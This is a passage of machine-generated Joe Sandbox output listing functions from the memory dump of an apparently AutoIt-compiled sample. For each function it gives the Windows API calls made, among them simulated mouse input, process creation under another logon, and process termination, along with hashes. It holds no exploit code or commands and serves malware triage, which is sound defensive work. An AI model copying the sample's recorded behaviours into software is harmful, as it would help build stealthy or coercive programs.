                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                              • String ID:
                                              • API String ID: 3311875123-0
                                              • Opcode ID: 811dd77b5d0a48d4f650c970de1d33a24098ee6791f719debde6065b204bf29a
                                              • Instruction ID: aa1620946c6bb7a0bb1b65819fb231bb236d03ae80c713e7ab83ff4154a1c5de
                                              • Opcode Fuzzy Hash: 811dd77b5d0a48d4f650c970de1d33a24098ee6791f719debde6065b204bf29a
                                              • Instruction Fuzzy Hash: 3E519A70A0030AEBDF25DF68D8C8BAEBBF4EF58314F1041A9E8159B2A1E7709945CB51
                                              Function 00B31B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 00B31B76
                                              • GetWindowRect.USER32(?,?), ref: 00B31BDA
                                              • ScreenToClient.USER32(?,?), ref: 00B31BF7
                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B31C08
                                              • EndPaint.USER32(?,?), ref: 00B31C52
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                              • String ID:
                                              • API String ID: 1827037458-0
                                              • Opcode ID: 69652f16c83cea8ecd7f6f8cfa97dc5db12f0b820e29999d0eb943317e128e57
                                              • Instruction ID: f8970a4202a6cedc39b09298583371f34170a186c7644c671de4583b63a3b73d
                                              • Opcode Fuzzy Hash: 69652f16c83cea8ecd7f6f8cfa97dc5db12f0b820e29999d0eb943317e128e57
                                              • Instruction Fuzzy Hash: 13419230144200AFD711EF29CC88FB67BFCEB49360F240AA9F9958B2A1CB309845DB61
                                              Function 00BBBD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(00BF77B0,00000000,01945748,?,?,00BF77B0,?,00BBBC1A,?,?), ref: 00BBBD84
                                              • EnableWindow.USER32(?,00000000), ref: 00BBBDA8
                                              • ShowWindow.USER32(00BF77B0,00000000,01945748,?,?,00BF77B0,?,00BBBC1A,?,?), ref: 00BBBE08
                                              • ShowWindow.USER32(?,00000004,?,00BBBC1A,?,?), ref: 00BBBE1A
                                              • EnableWindow.USER32(?,00000001), ref: 00BBBE3E
                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00BBBE61
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID:
                                              • API String ID: 642888154-0
                                              • Opcode ID: a6096e43daa85d8c678ca2766e89a818563cc3df25df5f4f489fa44ac576432b
                                              • Instruction ID: 7768f127ab65fb72384c2dc7dc9b38b49b3f6b5e2d0d26264551c990f1a8a827
                                              • Opcode Fuzzy Hash: a6096e43daa85d8c678ca2766e89a818563cc3df25df5f4f489fa44ac576432b
                                              • Instruction Fuzzy Hash: BD412A34600544AFDB26CF28C499FE57BE1FF09314F1841F9EA588F2A2CBB5A855CB61
                                              Function 00BA7788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00BA550C,?,?,00000000,00000001), ref: 00BA7796
                                                • Part of subcall function 00BA406C: GetWindowRect.USER32(?,?), ref: 00BA407F
                                              • GetDesktopWindow.USER32 ref: 00BA77C0
                                              • GetWindowRect.USER32(00000000), ref: 00BA77C7
                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00BA77F9
                                                • Part of subcall function 00B957FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B95877
                                              • GetCursorPos.USER32(?), ref: 00BA7825
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BA7883
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                              • String ID:
                                              • API String ID: 4137160315-0
                                              • Opcode ID: 2566d16984dcec25f389e07aa5b9a4cc0e76a8c19f8bde5e82f77457af66dd51
                                              • Instruction ID: 34cd826633ed75dd5a8e4b39ca0a38d84b94dc1570b12627283113147f916991
                                              • Opcode Fuzzy Hash: 2566d16984dcec25f389e07aa5b9a4cc0e76a8c19f8bde5e82f77457af66dd51
                                              • Instruction Fuzzy Hash: 0331CF72548305ABD720EF54CC49F9AB7E9FF89314F00092AF59997181CB74EA09CBA2
                                              Function 00B89431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B88CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B88CDE
                                                • Part of subcall function 00B88CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B88CE8
                                                • Part of subcall function 00B88CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B88CF7
                                                • Part of subcall function 00B88CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B88CFE
                                                • Part of subcall function 00B88CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B88D14
                                              • GetLengthSid.ADVAPI32(?,00000000,00B8904D), ref: 00B89482
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B8948E
                                              • HeapAlloc.KERNEL32(00000000), ref: 00B89495
                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B894AE
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00B8904D), ref: 00B894C2
                                              • HeapFree.KERNEL32(00000000), ref: 00B894C9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                              • String ID:
                                              • API String ID: 3008561057-0
                                              • Opcode ID: 879665588f88a69e56afd3cb3fa5d68999c91dc7138e95b15abdc9daf3cec1aa
                                              • Instruction ID: dafc4dc976ef85709b2d007c3c07e411b7d2580dbbcbe07ab83b543badbf1739
                                              • Opcode Fuzzy Hash: 879665588f88a69e56afd3cb3fa5d68999c91dc7138e95b15abdc9daf3cec1aa
                                              • Instruction Fuzzy Hash: 85117F72511604FFDF20AFA4CC49FBEBBE9EB45315F188198F945A7220CB359945CB60
                                              Function 00B891CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B89200
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00B89207
                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B89216
                                              • CloseHandle.KERNEL32(00000004), ref: 00B89221
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B89250
                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B89264
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                              • String ID:
                                              • API String ID: 1413079979-0
                                              • Opcode ID: 23630449894b0b4a2947375728b3cecfebe9a8d3a78a531695784a7ddc0dd7fa
                                              • Instruction ID: e27abd010bcf2f3d3276db71fbc3dafb1c4f779cc48cfddaeac63aebe9aa9d96
                                              • Opcode Fuzzy Hash: 23630449894b0b4a2947375728b3cecfebe9a8d3a78a531695784a7ddc0dd7fa
                                              • Instruction Fuzzy Hash: 0911177250124EFBDF01AF94ED49FEE7BA9EB48704F084055FE05A2160C6769D61EB60
                                              Function 00B8C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00B8C34E
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B8C35F
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B8C366
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00B8C36E
                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B8C385
                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 00B8C397
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: 33778b2122296e74884dff2062b5707b7e58aeaefac5fb6cb3051aefbc5c9baa
                                              • Instruction ID: 98c84a7f3c9c19a5daa97b02a4c09ab413581649e49496bed5c8eb6fa22c2f83
                                              • Opcode Fuzzy Hash: 33778b2122296e74884dff2062b5707b7e58aeaefac5fb6cb3051aefbc5c9baa
                                              • Instruction Fuzzy Hash: 580148B5E40318BBDF106FA59C45E5EBFB8EB58751F044065FA04A7250DA709D11CF60
                                              Function 00BBC552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B316CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B31729
                                                • Part of subcall function 00B316CF: SelectObject.GDI32(?,00000000), ref: 00B31738
                                                • Part of subcall function 00B316CF: BeginPath.GDI32(?), ref: 00B3174F
                                                • Part of subcall function 00B316CF: SelectObject.GDI32(?,00000000), ref: 00B31778
                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00BBC57C
                                              • LineTo.GDI32(00000000,00000003,?), ref: 00BBC590
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BBC59E
                                              • LineTo.GDI32(00000000,00000000,?), ref: 00BBC5AE
                                              • EndPath.GDI32(00000000), ref: 00BBC5BE
                                              • StrokePath.GDI32(00000000), ref: 00BBC5CE
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                              • String ID:
                                              • API String ID: 43455801-0
                                              • Opcode ID: 4ff0f05548a74043204393f553f62d99e602597fd6810a75b8cb79bac4272136
                                              • Instruction ID: 622a3885573dde9fd61065b407e4db488a027e54f84bde4352cd18733750092e
                                              • Opcode Fuzzy Hash: 4ff0f05548a74043204393f553f62d99e602597fd6810a75b8cb79bac4272136
                                              • Instruction Fuzzy Hash: 1D11097200010CBFDB12AF91DC89EEA7FADEB08354F048051BA589A160CB71AE55DBA0
                                              Function 00B507BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B507EC
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B507F4
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B507FF
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B5080A
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B50812
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B5081A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
                                              • Opcode ID: ca5e818d7c8613ac288e4ca7c9e4ae217ec6a1eda2346190b754cf6d4c8af68f
                                              • Instruction ID: 8c8e88c1d8dec1b1a04d7e8a7bb374647e9004524b07c38a2ff8e60cee659caa
                                              • Opcode Fuzzy Hash: ca5e818d7c8613ac288e4ca7c9e4ae217ec6a1eda2346190b754cf6d4c8af68f
                                              • Instruction Fuzzy Hash: 54016CB0901759BDE3009F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                              Function 00B959A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B959B4
                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B959CA
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00B959D9
                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B959E8
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B959F2
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B959F9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                              • String ID:
                                              • API String ID: 839392675-0
                                              • Opcode ID: 536beec5ee09ca732fbaf24be0bb96a3e56925a9ede024c4f174530c4e0013c8
                                              • Instruction ID: bb6564b3d9ed68dc0ad5b0059c6c965ea249303b3b55308398adf811b490fe39
                                              • Opcode Fuzzy Hash: 536beec5ee09ca732fbaf24be0bb96a3e56925a9ede024c4f174530c4e0013c8
                                              • Instruction Fuzzy Hash: 95F01D72251558FBE7216B929C0DEEF7A7CEBCAB11F040169FA05A2050DBA11A1186B5
                                              Function 00B977EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,?), ref: 00B977FE
                                              • EnterCriticalSection.KERNEL32(?,?,00B3C2B6,?,?), ref: 00B9780F
                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00B3C2B6,?,?), ref: 00B9781C
                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00B3C2B6,?,?), ref: 00B97829
                                                • Part of subcall function 00B971F0: CloseHandle.KERNEL32(00000000,?,00B97836,?,00B3C2B6,?,?), ref: 00B971FA
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B9783C
                                              • LeaveCriticalSection.KERNEL32(?,?,00B3C2B6,?,?), ref: 00B97843
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 3495660284-0
                                              • Opcode ID: 1769c4955193c3385c9c9a3e9104e89d11e6db9397134dbf7796b6952e87a4ed
                                              • Instruction ID: 273534af24f0cb59ec0b9f2d158740b8bb1db4f2501ec2702c206401b1e6e511
                                              • Opcode Fuzzy Hash: 1769c4955193c3385c9c9a3e9104e89d11e6db9397134dbf7796b6952e87a4ed
                                              • Instruction Fuzzy Hash: CDF05E321A5212EBD7113B64EC8CEAB77A9FF4D302F240461F102AA0A0CFB55801CB60
                                              Function 00B8954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B89555
                                              • UnloadUserProfile.USERENV(?,?), ref: 00B89561
                                              • CloseHandle.KERNEL32(?), ref: 00B8956A
                                              • CloseHandle.KERNEL32(?), ref: 00B89572
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00B8957B
                                              • HeapFree.KERNEL32(00000000), ref: 00B89582
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                              • String ID:
                                              • API String ID: 146765662-0
                                              • Opcode ID: 0fb85708a6efcd1834f376d004f39e3a05d45418f6abb2d93fbf4690b87d6e16
                                              • Instruction ID: 63601c6b4680ccc8b7f3b8bb631062f96ab4050136a0106330eeebfd0fbd1dda
                                              • Opcode Fuzzy Hash: 0fb85708a6efcd1834f376d004f39e3a05d45418f6abb2d93fbf4690b87d6e16
                                              • Instruction Fuzzy Hash: 05E0C236014541FBDA012BE6EC0CD5AFB29FB8D722B144221F22592070CF32A460DB50
                                              Function 00BA8CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00BA8CFD
                                              • CharUpperBuffW.USER32(?,?), ref: 00BA8E0C
                                              • VariantClear.OLEAUT32(?), ref: 00BA8F84
                                                • Part of subcall function 00B97B1D: VariantInit.OLEAUT32(00000000), ref: 00B97B5D
                                                • Part of subcall function 00B97B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00B97B66
                                                • Part of subcall function 00B97B1D: VariantClear.OLEAUT32(00000000), ref: 00B97B72
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4237274167-1221869570
                                              • Opcode ID: 654024f2184ec52713d1aade4295070fa7bb772f13f23711ea7aedeb7353f6e8
                                              • Instruction ID: 1e5ba5dc59a2f6402b1b2b8a031f7d2084d3cdaf28a11253460d08b65765e9bb
                                              • Opcode Fuzzy Hash: 654024f2184ec52713d1aade4295070fa7bb772f13f23711ea7aedeb7353f6e8
                                              • Instruction Fuzzy Hash: FC916B70608301DFC710DF24C48495ABBF5EF9A354F1489AEF89A8B7A2DB31E945CB52
                                              Function 00B9323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B4436A: _wcscpy.LIBCMT ref: 00B4438D
                                              • _memset.LIBCMT ref: 00B9332E
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B9335D
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B93410
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B9343E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                              • String ID: 0
                                              • API String ID: 4152858687-4108050209
                                              • Opcode ID: 4801efc5bf8a06e89846963af666c89ec9a13392b6cd49b84ad7f9e84d6d1ab0
                                              • Instruction ID: 047d375da31dcc9cf322b29b2a7c57deb95d3becc931dfa1e260f1e9eef3b645
                                              • Opcode Fuzzy Hash: 4801efc5bf8a06e89846963af666c89ec9a13392b6cd49b84ad7f9e84d6d1ab0
                                              • Instruction Fuzzy Hash: DD51CF316083009BDB259F28C845B6BBBE8EF45B60F0549BDF895D32E1DB20CE48C756
                                              Function 00B92EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B92F67
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B92F83
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00B92FC9
